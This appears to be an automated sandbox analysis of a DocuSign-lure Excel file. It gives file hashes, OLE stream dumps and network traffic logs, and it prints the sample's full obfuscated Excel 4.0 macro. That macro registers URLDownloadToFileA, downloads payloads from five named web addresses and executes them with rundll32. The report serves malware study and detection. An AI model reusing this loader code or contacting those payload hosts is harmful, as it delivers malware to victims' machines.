Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.654008658396181 |
Encrypted: | false |
SSDEEP: | 12:8McXUvJjduCH2POXAyDXOVs5Cm+WrjAZ/DYbDkLSeuSeL44t2Y+xIBjKZm:8Mx/XmV4CkAZbcDA7aB6m |
MD5: | 0909656D991462AF73F5D517D79FBAC5 |
SHA1: | 166ED100EB72AFF58669562F97C2EF69EB19FC86 |
SHA-256: | 3A3E9F1C9D5023143AE8E8B4913EE66F96FB0ADB1FF7410733BDA98DAA4596EE |
SHA-512: | ED32D74B0D48F2E7EB8C64FCE2720EE9F261B31C3C5EB4DD6FBE980C2FDCABBBCE0078855DEB201BA42A6F51407DBADF256C4380021C0BDC3CD1CB4AAD02FE82 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 137 |
Entropy (8bit): | 4.791427181491947 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMYlIiSWcz0FXrl+1lIiSWcz0FXrlmMYlIiSWcz0FXrlv:dj6Yl4ubal4ubxYl4ub1 |
MD5: | 733D335954A7C87A9071F01D9ACBE348 |
SHA1: | 1AE168C09F0041C079663BCD4AB9162F33CD7623 |
SHA-256: | 87A461F640E439196E55DB894090873D4B9F7FC9D895E4DCD13B2346165BA1B6 |
SHA-512: | 04CB3D8787A8BA5A86F04E8162756D4A93DB3A2A8BDEB6E6128376E1EBF2978177B3B0A4986D3723DA6159C39765E5C0E76DE63097CD5A9289E37E1EC141A1E9 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22 |
Entropy (8bit): | 2.9808259362290785 |
Encrypted: | false |
SSDEEP: | 3:QAlX0Gn:QKn |
MD5: | 7962B839183642D3CDC2F9CEBDBF85CE |
SHA1: | 2BE8F6F309962ED367866F6E70668508BC814C2D |
SHA-256: | 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6 |
SHA-512: | 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 111230 |
Entropy (8bit): | 6.668853911800476 |
Encrypted: | false |
SSDEEP: | 3072:8s8rmOAIyyzElBIL6lECbgBGzP5xLm7TdK79nGzeNR69mGzeNRlDGzeNR6Gs8rma:F8rmOAIyyzElBIL6lECbgB+P5Nm7TdKn |
MD5: | 56AEACF20EEC43D6FE9469D4D54B1E77 |
SHA1: | BB1F142DA8765D0CF38B8097018C94BE82E94E83 |
SHA-256: | B2055DF49308485C5E6E8527498647782535556F2B107368264BE663D496AC3D |
SHA-512: | 74B62A889B58AED884F6F475DADDB160E449294EE71D9A4F5DDD6B79B645A0E40B3A50285E2D437FEF37F2D428329DE2B04C4AB8D56C156DC0964732D5B091E1 |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.697666945848156 |
TrID: |
|
File name: | Complaint-447781983-02182021.xls |
File size: | 145920 |
MD5: | 60f845a847e771a59b97d456c494f69d |
SHA1: | bf79e4535e5d15cfbd4c6eb2fa2d086703ad81d6 |
SHA256: | c44df560766b2a3f60adba4ef6448e266a3036e19fc1631ae9ada22628447319 |
SHA512: | e942975e9b88c1e3783fa7723b8dcaf4cf1acc63e36380a56543ab96393815df27426169d38235790314de18590b0ed1363d38296e3b4a5543dba0f849f103e0 |
SSDEEP: | 3072:GcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOMRt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/V:GcPiTQAVW/89BQnmlcGvgZ7r3J8YUOMU |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | 74ecd4c6c3c6c4d8 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "Complaint-447781983-02182021.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-02-18 13:42:21 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.321292606979 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.2746714277 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 135085 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 135085 |
Entropy: | 3.69042254796 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . F r i n e r B . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . B I O L A F E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . A . . . . . . . . . . . . . |
Data Raw: | 09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 06 46 72 69 6e 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,,,,,"=RIGHT(""dfrgbrd4567w547547w7b,DllRegister"",12)&T26",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""1""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""2""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""3""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""4""&T19,41))",,,=HALT(),,,,,,,,,,,
,,,Server,,,,,,,,,,,,,,,,=NOW(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(D129,DocuSign!T26)",,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(A130*1000000000000000,B133)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""ghydbetrf46et5eb645bv7ea45istbsebtuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""45bh4g5nuwyftneragntrnrfaktsgbutnrkltgrkbownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCCBB"",""BIOLAFE"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=BIOLAFE(0,T137&B138&B133&D145&D146&D147&D148,D141,0,0)",rzminc.com/xklyulyijvn/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B139&B133&D145&D146&D147&D148,D141&""1"",0,0)",pathinanchilearthmovers.com/eznwcdhx/,,"=RIGHT(""hiuhnUBGYGBYnt7t67tb67rIftfFFDFFDTbtrdrtdgjcndll32"",6)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B140&B133&D145&D146&D147&D148,D141&""2"",0,0)",jugueterialatorre.com.ar/xjzpfwc/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B141&B133&D145&D146&D147&D148,D141&""3"",0,0)",rzminc.com/fdzgprclatqo/,,"=RIGHT(""nnhjgbgvdvgekvnrtve6reb6tn6rdtryt6smy65ty56s445nr6x..\JDFR.hdfgr"",13)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B142&B133&D145&D146&D147&D148,D141&""4"",0,0)",biblicalisraeltours.com/otmchxmxeg/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,t,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 23, 2021 14:25:52.868345022 CET | 49730 | 80 | 192.168.2.4 | 72.52.227.180 |
Feb 23, 2021 14:25:53.024216890 CET | 80 | 49730 | 72.52.227.180 | 192.168.2.4 |
Feb 23, 2021 14:25:53.024317026 CET | 49730 | 80 | 192.168.2.4 | 72.52.227.180 |
Feb 23, 2021 14:25:53.024821997 CET | 49730 | 80 | 192.168.2.4 | 72.52.227.180 |
Feb 23, 2021 14:25:53.180587053 CET | 80 | 49730 | 72.52.227.180 | 192.168.2.4 |
Feb 23, 2021 14:25:53.485604048 CET | 80 | 49730 | 72.52.227.180 | 192.168.2.4 |
Feb 23, 2021 14:25:53.485677958 CET | 49730 | 80 | 192.168.2.4 | 72.52.227.180 |
Feb 23, 2021 14:25:53.485748053 CET | 80 | 49730 | 72.52.227.180 | 192.168.2.4 |
Feb 23, 2021 14:25:53.485800028 CET | 49730 | 80 | 192.168.2.4 | 72.52.227.180 |
Feb 23, 2021 14:25:53.487128019 CET | 49730 | 80 | 192.168.2.4 | 72.52.227.180 |
Feb 23, 2021 14:25:53.645163059 CET | 80 | 49730 | 72.52.227.180 | 192.168.2.4 |
Feb 23, 2021 14:25:53.698911905 CET | 49732 | 80 | 192.168.2.4 | 162.241.80.6 |
Feb 23, 2021 14:25:53.865453005 CET | 80 | 49732 | 162.241.80.6 | 192.168.2.4 |
Feb 23, 2021 14:25:53.865612030 CET | 49732 | 80 | 192.168.2.4 | 162.241.80.6 |
Feb 23, 2021 14:25:53.866291046 CET | 49732 | 80 | 192.168.2.4 | 162.241.80.6 |
Feb 23, 2021 14:25:54.023978949 CET | 80 | 49732 | 162.241.80.6 | 192.168.2.4 |
Feb 23, 2021 14:25:54.569462061 CET | 80 | 49732 | 162.241.80.6 | 192.168.2.4 |
Feb 23, 2021 14:25:54.569523096 CET | 49732 | 80 | 192.168.2.4 | 162.241.80.6 |
Feb 23, 2021 14:25:54.894741058 CET | 49734 | 80 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:25:55.179120064 CET | 80 | 49734 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:25:55.179322958 CET | 49734 | 80 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:25:55.179770947 CET | 49734 | 80 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:25:55.469976902 CET | 80 | 49734 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:25:56.756165028 CET | 80 | 49734 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:25:56.756186962 CET | 80 | 49734 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:25:56.756371975 CET | 49734 | 80 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:25:56.763923883 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:25:57.049062014 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:25:57.049289942 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:25:57.050266981 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:25:57.337471008 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:25:57.338987112 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:25:57.339107037 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:25:57.339162111 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:25:57.339196920 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:25:57.339260101 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:25:57.785151005 CET | 49738 | 80 | 192.168.2.4 | 91.199.212.52 |
Feb 23, 2021 14:25:57.848018885 CET | 80 | 49738 | 91.199.212.52 | 192.168.2.4 |
Feb 23, 2021 14:25:57.848191977 CET | 49738 | 80 | 192.168.2.4 | 91.199.212.52 |
Feb 23, 2021 14:25:57.848548889 CET | 49738 | 80 | 192.168.2.4 | 91.199.212.52 |
Feb 23, 2021 14:25:57.911484957 CET | 80 | 49738 | 91.199.212.52 | 192.168.2.4 |
Feb 23, 2021 14:25:57.911541939 CET | 80 | 49738 | 91.199.212.52 | 192.168.2.4 |
Feb 23, 2021 14:25:57.911576986 CET | 80 | 49738 | 91.199.212.52 | 192.168.2.4 |
Feb 23, 2021 14:25:57.911649942 CET | 49738 | 80 | 192.168.2.4 | 91.199.212.52 |
Feb 23, 2021 14:25:57.926559925 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:25:58.212116957 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:25:58.212212086 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:25:58.213407040 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:25:58.626422882 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:25:59.570209026 CET | 80 | 49732 | 162.241.80.6 | 192.168.2.4 |
Feb 23, 2021 14:25:59.575273037 CET | 49732 | 80 | 192.168.2.4 | 162.241.80.6 |
Feb 23, 2021 14:26:01.757095098 CET | 80 | 49734 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:01.757244110 CET | 49734 | 80 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.486850023 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.486881971 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.486900091 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.486916065 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.486932993 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.486952066 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.486968994 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.486984968 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.487000942 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.487041950 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.487061024 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.487129927 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.489072084 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.489135027 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.497642040 CET | 49743 | 80 | 192.168.2.4 | 72.52.227.180 |
Feb 23, 2021 14:26:02.658185005 CET | 80 | 49743 | 72.52.227.180 | 192.168.2.4 |
Feb 23, 2021 14:26:02.658401966 CET | 49743 | 80 | 192.168.2.4 | 72.52.227.180 |
Feb 23, 2021 14:26:02.659064054 CET | 49743 | 80 | 192.168.2.4 | 72.52.227.180 |
Feb 23, 2021 14:26:02.772351027 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.772422075 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.772463083 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.772515059 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.772578001 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.772579908 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.772624969 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.772631884 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.772636890 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.772645950 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.772701979 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.772711992 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.772754908 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.772761106 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.772810936 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.772813082 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.772865057 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.772866011 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.772917986 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.772917986 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.772969007 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.772972107 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.773021936 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.773024082 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.773080111 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.773083925 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.773138046 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
Feb 23, 2021 14:26:02.773140907 CET | 443 | 49737 | 138.36.237.100 | 192.168.2.4 |
Feb 23, 2021 14:26:02.773191929 CET | 49737 | 443 | 192.168.2.4 | 138.36.237.100 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 23, 2021 14:25:35.948244095 CET | 53723 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:35.997133017 CET | 53 | 53723 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:36.241441965 CET | 64646 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:36.290787935 CET | 53 | 64646 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:36.497275114 CET | 65298 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:36.546272039 CET | 53 | 65298 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:39.484381914 CET | 59123 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:39.543113947 CET | 53 | 59123 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:39.807583094 CET | 54531 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:39.858936071 CET | 53 | 54531 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:41.176209927 CET | 49714 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:41.225099087 CET | 53 | 49714 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:42.647861004 CET | 58028 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:42.696520090 CET | 53 | 58028 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:47.697901011 CET | 53097 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:47.757951975 CET | 53 | 53097 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:49.008389950 CET | 49257 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:49.067048073 CET | 53 | 49257 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:49.500225067 CET | 62389 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:49.563935041 CET | 53 | 62389 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:49.968599081 CET | 49910 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:50.017833948 CET | 53 | 49910 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:50.516366005 CET | 62389 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:50.578011036 CET | 53 | 62389 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:51.530107975 CET | 62389 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:51.590218067 CET | 53 | 62389 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:52.664776087 CET | 55854 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:52.865950108 CET | 53 | 55854 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:52.880219936 CET | 64549 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:52.931766987 CET | 53 | 64549 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:53.498677969 CET | 63153 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:53.545864105 CET | 62389 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:53.607526064 CET | 53 | 62389 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:53.696513891 CET | 53 | 63153 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:54.131462097 CET | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:54.180557013 CET | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:54.586744070 CET | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:54.891293049 CET | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:55.344700098 CET | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:55.404779911 CET | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:56.220449924 CET | 56794 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:56.278127909 CET | 53 | 56794 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:57.660541058 CET | 62389 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:57.720671892 CET | 53 | 62389 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:57.734325886 CET | 56534 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:57.783886909 CET | 53 | 56534 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:57.804344893 CET | 56627 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:57.858009100 CET | 53 | 56627 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:25:58.767709970 CET | 56621 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:25:58.818391085 CET | 53 | 56621 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:00.426373005 CET | 63116 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:00.475431919 CET | 53 | 63116 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:01.229185104 CET | 64078 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:01.280988932 CET | 53 | 64078 | 8.8.8.8 | 192.168.2.4 |
